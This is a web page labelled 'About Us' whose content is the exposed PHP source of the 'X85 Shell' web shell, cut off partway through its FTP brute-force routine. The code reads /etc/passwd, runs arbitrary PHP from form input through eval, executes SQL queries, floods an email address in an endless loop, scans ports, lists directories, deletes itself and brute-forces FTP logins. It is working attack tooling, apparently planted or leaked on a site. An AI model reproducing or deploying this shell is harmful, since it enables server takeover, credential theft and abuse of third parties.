 |
About Us |
|
phpv = @phpversion(); $this->uid = getmyuid(); $this->gid = getmygid(); $this->pid = getmypid(); $this->linuxv = wordwrap(php_uname(), 90, "
", 1); $this->uip = $_SERVER[REMOTE_ADDR]; $this->sip = $_SERVER[SERVER_ADDR]; $prefix = " ".chr("187").chr("187")." "; $suffix = NULL; $safemodestatus = $this->SafeModeStatus(); echo <<
X85 Shell
X85 Shell v.{$ver}
Safe Mode: {$safemodestatus}
Software: {$_SERVER['SERVER_SOFTWARE']}
uname -u: {$this->linuxv}
PHP Version: {$this->phpv}
UID: {$this->uid}, GID: {$this->gid}, PID: {$this->pid}
Your ip: {$this->uip}, Server ip: {$this->sip}
Programmed by Pr0T3cT10n & Hyp3rInj3cT10n © 2007
[ Execution Time: {$EndTime} ] [ Shell Version: {$ver} ]
END; } function EtcPasswd(){ $end = ($_GET['end'] > 0) ? $_GET['end'] : 5000 ; $result = "Read /etc/passwd (Bypass)
"; $result .= "Read first:
\n"; $result .= "Trying to get /etc/passwd...."; if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")){ $result .= "Done!"; $result .= '
name |
passwd |
uid |
gid |
gecos |
dir |
shell |
|---|
'; for($x=0;$x<$end;$x++){ $details = posix_getpwuid($x); if($details['name']) $result .= '
'.$details['name'].' |
'.$details['passwd'].' |
'.$details['uid'].' |
'.$details['gid'].' |
'.$details['gecos'].' |
'.$details['dir'].' |
'.$details['shell'].' | '; } $result .= '
'; } else $result .= "Failed."; return $result; } function SafeModeStatus(){ if(function_exists("ini_get") and is_callable("ini_get")) if(ini_get('safe_mode') == "1" or strtoupper(ini_get('safe_mode')) == "ON") return "On"; else return "Off"; else return "Unknown"; } function OpenBaseDirStatus(){ if(function_exists("ini_get") and is_callable("ini_get")) if(strlen(ini_get('open_basedir')) > 3) return "On"; else return "Off"; else return "Unknown"; } function Details(){ $result = "View Server Information
"; $result .= "Safe Mode: ".$this->SafeModeStatus()."
\n"; $result .= "Open BaseDir: ".$this->OpenBaseDirStatus()."
\n"; $os = @php_uname(); $Functions = array( "PHP Version" => "phpversion", "PHP Logo Guid" => "php_logo_guid", "PHP Sapi Name" => "php_sapi_name", "Zend Version" => "zend_version", "Zend Logo Guid" => "zend_logo_guid", "Apache Version" => "apache_get_version", "Current User" => "get_current_user", "Current Gid" => "getmygid", "Current Uid" => "getmyuid", "Current Pid" => "getmypid", "Current Inode" => "getmyinode", "Operation System Info" => "php_uname", ); foreach($Functions as $desc=>$func) if(function_exists($func) and is_callable($func)) $result .= "".$desc.": ".@$func()."
\n"; //Operation System Name if(defined("PHP_OS")){ $result .= "Operation System: ".PHP_OS."
\n"; $os = PHP_OS; } //Server Software if(isset($_SERVER['SERVER_SOFTWARE']) and strlen($_SERVER['SERVER_SOFTWARE']) > 0) $result .= "Server Software: ".$_SERVER['SERVER_SOFTWARE']."
\n"; //Server IP $result .= "Server IP Address: ".$_SERVER['SERVER_ADDR']."
\n"; //Loaded Modules if(function_exists("apache_get_modules") and is_callable("apache_get_modules")){ $result .= "Loaded Modules: "; $count_modules = 0; foreach(apache_get_modules() as $module){ $result .= $module; if($count_modules == count(apache_get_modules())-1) $result.= "."; else $result.= ", "; $count_modules++; } $result .= "
\n"; $result .= "Total Loaded Modules: ".$count_modules."
\n"; } //Loaded Extensions if(function_exists("get_loaded_extensions") and is_callable("get_loaded_extensions")){ $result .= "Loaded Extensions: "; $count_ext = 0; foreach(get_loaded_extensions() as $module){ $result .= $module; if($count_ext == count(get_loaded_extensions())-1) $result.= "."; else $result.= ", "; $count_ext++; } $result .= "
\n"; $result .= "Total Loaded Extensions: ".$count_ext."
\n"; } //Main Path $path = (eregi("win",strtolower($os))) ? "C:" : "/" ; //Total Disk Space if(function_exists("disk_total_space") and is_callable("disk_total_space")){ $Total = substr(disk_total_space($path) / 1024 / 1024 / 1024,0,4); $result .= "Total Disk Space: ".$Total." GB
"; } //Free Disk Space if(function_exists("disk_free_space") and is_callable("disk_free_space")){ $FreeFunc = "disk_free_space"; $Free = substr(disk_free_space($path) / 1024 / 1024 / 1024,0,4); $result .= "Free Disk Space: ".$Free." GB"; } else{ if(function_exists("diskfreespace") and is_callable("diskfreespace")){ $FreeFunc = "diskfreespace"; $Free = substr(diskfreespace($path) / 1024 / 1024 / 1024,0,4); $result .= "Free Disk Space: ".$Free." GB"; } } //Free Disk Space In Percents if(eregi("Free",$result) and eregi("Total",$result)) $result .= " (".substr($FreeFunc($path) * 100 / disk_total_space($path),0,4)."% Free)"; $result .= "
\n"; //Drivers if($path != "/"){ $result .= "Detected Drivers: "; $count = 1; $Drivers = array(); foreach(range("a","z") as $driver) if(is_dir($driver.":\\")) $Drivers[] = $driver; foreach($Drivers as $driver){ $result .= $driver; if($count == count($Drivers)) $result .= "."; else $result .= ", "; $count++; } } return $result; } function Encoder(){ $result = "Professional Encoder
"; $string = stripslashes($_POST['encodetxt']); $result .= "\n"; if(isset($_POST['submit'])){ if(function_exists("hash_algos") and is_callable("hash_algos") and function_exists("hash") and is_callable("hash")){ $Hashes = hash_algos(); foreach($Hashes as $hash){ $rs = @hash($hash,$string); $result .= "
".$hash.": (".strlen($rs)." letters)
\n"; } } $More = array( "MD5" => "md5", "Sha1" => "sha1", "Crc32" => "crc32", "Crypt" => "crypt", "Base64 Encode" => "base64_encode", "Base64 Decode" => "base64_decode", "UU Encode" => "convert_uuencode", "UU Decode" => "convert_uudecode", "URL Encode" => "urlencode", "URL Decode" => "urldecode", "RawURL Encode" => "rawurlencode", "RawURL Decode" => "rawurldecode", "UTF-8 Encode" => "utf8_encode", "UTF-8 Decode" => "utf8_decode", "Shuffle" => "str_shuffle", "Reverse" => "str_rev", "Rot13" => "str_rot13", ); foreach($More as $name=>$func) if(function_exists($func) and is_callable($func)) if(!in_array($func,$Hashes)){ $rs = htmlspecialchars(@$func($string)); $result .= "
".strtolower($name).": (".strlen($rs)." letters)
\n"; } } return $result; } function PHPCode(){ ob_start(); $result = "PHP Codes Execution
\n"; $result .= "
"; $eval = (isset($_POST['code'])) ? stripslashes($_POST['code']) : ""; if($eval != ""){ eval($eval); $eresult = ob_get_contents(); $result .= ""; } ob_end_clean(); return $result; } function SQLCode(){ $host = (isset($_POST['host'])) ? stripslashes($_POST['host']) : "localhost" ; $username = (isset($_POST['username'])) ? stripslashes($_POST['username']) : "root" ; $password = (isset($_POST['password'])) ? stripslashes($_POST['password']) : "" ; $database = (isset($_POST['database'])) ? stripslashes($_POST['database']) : "" ; $query = (isset($_POST['code'])) ? stripslashes($_POST['code']) : "" ; $result = "SQL Queries Execution
\n"; $result .= "
"; if(isset($_POST['submit'])) if(!@mysql_connect($host,$username,$password)) $result .= "Error: ".htmlspecialchars(mysql_error()); else if(!@mysql_select_db($database)) $result .= "Error: ".htmlspecialchars(mysql_error()); else if(!@$Q=mysql_query($query)) $result .= "Error: ".htmlspecialchars(mysql_error()); else $result .= "Query Executed Successfuly."; return $result; } function MailFlooder(){ $email = (isset($_POST['email'])) ? stripslashes($_POST['email']) : "" ; $title = (isset($_POST['title'])) ? stripslashes($_POST['title']) : "" ; $content = (isset($_POST['content'])) ? stripslashes($_POST['content']) : "" ; $result = "Online E-Mails Flooder
\n"; $result .= "
"; if(isset($_POST['submit'])){ if(function_exists("mail") and is_callable("mail")){ $result .= "Flooding..."; while(!$none) mail($email,$title,$content); $result .= "The specified E-Mail Address should be flooded."; } else{ $result .= "Unable to send E-Mails."; } } return $result; } function SelfRemove(){ $result = "Self Remover
"; if($_GET['confirmed'] == "true") if(@unlink(__FILE__)) $result .= "Removed Successfully!"; else $result .= "Can't remove myself, there are not enough permissions."; else $result .= "Are you sure? Yes No"; return $result; } function OpenPortsScanner(){ $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ; $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ; echo("
"); echo("Open Ports Scanner
"); echo(''); if(isset($_POST['submit'])){ $first = "yes"; echo("
Results:
\n"); if($_POST['port'] == "range"){ if($rend > $rstart){ for($i=$rstart;$i<$rend;$i++){ if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){ if($first == "no") echo(", "); echo $i; $first = "no"; } } echo("."); } else{ echo("Range start number can't be bigger than the end number."); } } else if($_POST['port'] == "specific"){ $list = explode(" ",$_POST['specific']); foreach($list as $i){ if(is_numeric($i)){ if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){ if($first == "no") echo(", "); echo $i; $first = "no"; } } } echo("."); } else{ for($i=0;$i>=0;$i++){ if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){ if($first == "no") echo(", "); echo $i; $first = "no"; } } echo("."); } } } function ListDir($dir){ function LettersPerms($file){ $perms = @fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } if($dir == "") $dir = $_SERVER['DOCUMENT_ROOT'].dirname($_SERVER['PHP_SELF'])."/"; $result = "List Directories & Files
"; $result .= "Trying to list directory: "; $Pathes = explode("/",$dir); $lastpath = NULL; foreach($Pathes as $k=>$path){ if($path != "" or $k == "0"){ $path .= "/"; $result .= "".$path.""; $lastpath .= $path; } } $result .= "
\n"; $result .= "
Name |
Size |
Last Modified |
Permissions |
Actions |
|---|
"; if(dirname($dir) != str_replace("\/","",$dir)) $result .= "
\n"; $result .= "
.. | \n"; $result .= "
- | \n"; $result .= "
| \n"; $result .= "
".@fileperms(dirname($dir))." (".LettersPerms(dirname($dir)).")"." | \n"; $result .= "
| \n"; $result .= " \n"; $glob = $dir."*"; $files = glob($glob); foreach($files as $name){ $FileDir = dirname($name)."/"; $FileName = basename($name); if(is_dir($FileDir.$FileName)){ $result .= "
\n"; $result .= "
".$FileName."/ | \n"; $result .= "
- | \n"; $result .= "
| \n"; $result .= "
".@fileperms($FileDir.$FileName)." (".@LettersPerms($FileDir.$FileName).")"." | \n"; $result .= "
| \n"; $result .= " \n"; } else{ $result .= "
\n"; $result .= "
".$FileName." | \n"; $result .= "
".substr(filesize($FileDir.$FileName) / 1024,0,6)." KB | \n"; $result .= "
| \n"; $result .= "
".@fileperms($FileDir.$FileName)." (".@LettersPerms($FileDir.$FileName).")"." | \n"; $result .= "
| \n"; $result .= " \n"; } } $result .= "
\n"; $result .= "
\n"; return $result; } function FTPBruteForce(){ echo("Online FTP BruteForce
"); $_POST['usernames'] = htmlspecialchars($_POST['usernames']); $_POST['passwords'] = htmlspecialchars($_POST['passwords']); $chkdun = (isset($_POST['all_usernames'])) ? " checked=\"checked\"" : "" ; $chkdpw = (isset($_POST['password_equal_username'])) ? " checked=\"checked\"" : "" ; echo(''); if(isset($_POST['submit'])){ echo('
Results:
'); if(function_exists("fsockopen") and is_callable("fsockopen")){ $start = time(); $host = "127.0.0.1"; $port = "21"; $usernames = explode("\r\n",$_POST['usernames']); $passwords = explode("\r\n",$_POST['passwords']); if(isset($_POST['all_usernames'])){ if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")){ $usernames = array(); $number = ($_POST['end'] > 0) ? $_POST['end'] : "5000"; for($x=0;$x<$number;$x++){ $user = posix_getpwuid($x); if(strlen($user[name]) > 0) $usernames[] = $user[name]; } } else{ echo("Unable to get usernames list.
"); } } $usernames_count = count($usernames); $passwords_count = count($passwords); $results = 0; foreach($usernames as $user){ if(isset($_POST['password_equal_username'])) $passwords['user'] = $user; foreach($passwords as $pass){ $sock = @fsockopen($host, $port, $errno, $errstr, 10); $get = @fgets($sock, 150); @fputs($sock, "USER " .$user. "\n"); $get = @fgets($sock, 150); |
|
|
